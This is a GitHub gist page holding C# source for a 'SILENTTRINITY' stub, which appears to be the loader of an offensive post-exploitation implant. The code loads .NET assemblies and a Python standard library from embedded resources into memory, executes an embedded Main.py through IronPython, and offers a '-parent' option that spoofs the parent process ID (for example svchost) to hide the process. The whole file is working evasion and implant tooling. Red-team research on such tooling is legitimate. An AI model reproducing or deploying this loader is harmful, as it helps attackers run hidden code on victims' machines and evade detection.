Last active
October 13, 2018 00:38
-
-
Save byt3bl33d3r/659bb5635cf1682ac9e8a5c9a29f130c to your computer and use it in GitHub Desktop.
SILENTTRINITY c# stub with embedded IPY stdlib support
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using IronPython.Hosting; | |
using IronPython.Modules; | |
//using IronPython.Runtime; | |
using System.IO; | |
using System.Linq; | |
using System.Reflection; | |
using Microsoft.Scripting.Hosting; | |
using Microsoft.Scripting.Utils; | |
using System.Collections.Generic; | |
//using System.Diagnostics; | |
//using System.Windows.Forms; | |
namespace SILENTTRINITY | |
{ | |
public class Runtime | |
{ | |
// https://mail.python.org/pipermail/ironpython-users/2012-December/016366.html | |
// http://ironpython.net/blog/2012/07/07/whats-new-in-ironpython-273.html | |
// https://blog.adamfurmanek.pl/2017/10/14/sqlxd-part-22/ | |
public dynamic CreateEngine() | |
{ | |
ScriptRuntimeSetup setup = Python.CreateRuntimeSetup(options: GetRuntimeOptions()); | |
var pyRuntime = new ScriptRuntime(setup); | |
ScriptEngine engineInstance = Python.GetEngine(pyRuntime); | |
AddPythonLibrariesToSysMetaPath(engineInstance); | |
return engineInstance; | |
} | |
public void AddPythonLibrariesToSysMetaPath(ScriptEngine engineInstance) | |
{ | |
Assembly asm = GetType().Assembly; | |
var resQuery = | |
from name in asm.GetManifestResourceNames() | |
where name.ToLowerInvariant().EndsWith(".zip") | |
select name; | |
string resName = resQuery.Single(); | |
Console.WriteLine("Found Python embedded stdlib: {0}", resName); | |
var importer = new ResourceMetaPathImporter(asm, resName); | |
dynamic sys = engineInstance.GetSysModule(); | |
sys.meta_path.append(importer); | |
sys.path.append(importer); | |
//List metaPath = sys.GetVariable("meta_path"); | |
//metaPath.Add(importer); | |
//sys.SetVariable("meta_path", metaPath); | |
} | |
private static IDictionary<string, object> GetRuntimeOptions() | |
{ | |
var options = new Dictionary<string, object> | |
{ | |
["Debug"] = false | |
}; | |
return options; | |
} | |
public static void DumpEmbeddedResources() | |
{ | |
string[] resourceNames = Assembly.GetExecutingAssembly().GetManifestResourceNames(); | |
foreach (string resourceName in resourceNames) | |
{ | |
Console.WriteLine(resourceName); | |
} | |
} | |
public static void Main(string[] args) | |
{ | |
Console.WriteLine("Available embedded resources:"); | |
DumpEmbeddedResources(); | |
Console.WriteLine("\n"); | |
AppDomain.CurrentDomain.AssemblyResolve += (sender, resourceargs) => { | |
String assemblyName = new AssemblyName(resourceargs.Name).Name; | |
Console.WriteLine("Trying to resolve {0}", assemblyName); | |
String resourceName = "SILENTTRINITY.Resources." + assemblyName + ".dll"; | |
// Console.WriteLine("resourceName: {0}", resourceName); | |
using (var stream = Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceName)) | |
{ | |
Byte[] assemblyData = new Byte[stream.Length]; | |
stream.Read(assemblyData, 0, assemblyData.Length); | |
return Assembly.Load(assemblyData); | |
} | |
}; | |
// Get Assembly Path | |
string BinaryPath = Assembly.GetExecutingAssembly().CodeBase; | |
//string lpApplicationName = BinaryPath.Replace("file:///", string.Empty).Replace("/", @"\"); | |
string lpApplicationName = Assembly.GetEntryAssembly().Location; | |
if (args.Length == 1 && args[0].ToLower() == "-parent") | |
{ | |
Console.WriteLine("\n [+] Please enter a valid Parent Process name."); | |
Console.WriteLine(" [+] For Example: {0} -parent svchost", lpApplicationName); | |
return; | |
} | |
else if (args.Length == 2) | |
{ | |
if (args[0].ToLower() == "-parent" && args[1] != null) | |
{ | |
string PPIDName = args[1]; | |
int NewPPID = 0; | |
// Find PID from our new Parent and start new Process with new Parent ID | |
NewPPID = ProcessCreator.NewParentPID(PPIDName); | |
if (NewPPID == 0) | |
{ | |
Console.WriteLine("\n [!] No suitable Process ID Found..."); | |
return; | |
} | |
if (!ProcessCreator.CreateProcess(NewPPID, lpApplicationName, null)) | |
{ | |
Console.WriteLine("\n [!] Oops PPID Spoof failed..."); | |
return; | |
} | |
} | |
} | |
else | |
{ | |
CreateRuntime(); | |
} | |
return; | |
} | |
public static void CreateRuntime() | |
{ | |
Runtime runtime = new Runtime(); | |
var myScript = (string)null; | |
try | |
{ | |
myScript = new StreamReader(Assembly.GetExecutingAssembly().GetManifestResourceStream("SILENTTRINITY.Resources.Main.py")).ReadToEnd(); | |
} | |
catch | |
{ | |
Console.WriteLine("Error accessing embedded Main.py file"); | |
} | |
ScriptEngine engine = runtime.CreateEngine(); | |
engine.Execute(myScript); | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment